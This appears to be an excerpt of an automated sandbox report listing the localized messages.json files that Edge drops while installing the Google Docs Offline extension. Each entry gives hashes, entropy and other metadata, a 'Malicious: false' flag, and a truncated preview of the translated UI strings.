Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
